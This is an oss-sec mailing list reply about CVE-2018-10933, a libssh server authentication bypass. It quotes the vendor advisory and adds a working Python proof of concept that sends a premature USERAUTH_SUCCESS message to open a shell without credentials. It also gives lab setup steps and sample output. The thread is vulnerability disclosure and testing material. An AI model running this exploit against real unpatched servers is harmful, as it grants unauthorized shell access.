oss-sec mailing list archives
Re: CVE-2018-10933: libssh: authentication bypass in server code
From: Minh Tuan Luong <not.soledad () gmail com>
Date: Wed, 17 Oct 2018 16:13:24 +0700
I have coded a simple POC for this CVE: --- CVE-2018-10933.py ---- import paramiko import socket import sys nbytes = 4096 hostname = "127.0.0.1" port = 2222 sock = socket.socket() try: sock.connect((hostname, port)) # instantiate transport m = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(m) cmd_channel = transport.open_session() cmd_channel.invoke_shell() except socket.error:print '[-] Connecting to host failed. Please check the specified host and port.'
sys.exit(1) -----to test this code: get vulnerable version of libssh at homepage: https://www.libssh.org/files/0.7/libssh-0.7.4.tar.xz after uncompress and build, go to example directory, there's a simple sshd server using libssh name: samplesshd-cb
run this simple sshd by command: $ samplesshd-cb 127.0.0.1 -p 2222 then run my code, output will be: Allocated session channel Allocated shellmean that i can bypass authentication and spawn a shell without any credential
Regard, Soledad On 10/16/2018 7:21 PM, Marcus Meissner wrote:
Hi, https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/ ----- libssh 0.8.4 and 0.7.6 security and bugfix release This is an important security and maintenance release in order to address CVE-2018-10933. libssh versions 0.6 and above have an authentication bypass vulnerability in the server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication, the attacker could successfully authentciate without any credentials. The bug was discovered by Peter Winter-Smith of NCC Group. ----- This only affects libssh operating in _server_ mode, but not the usual used client mode. Ciao, Marcus
Current thread:
- CVE-2018-10933: libssh: authentication bypass in server code Marcus Meissner (Oct 16)
- Re: CVE-2018-10933: libssh: authentication bypass in server code Minh Tuan Luong (Oct 17)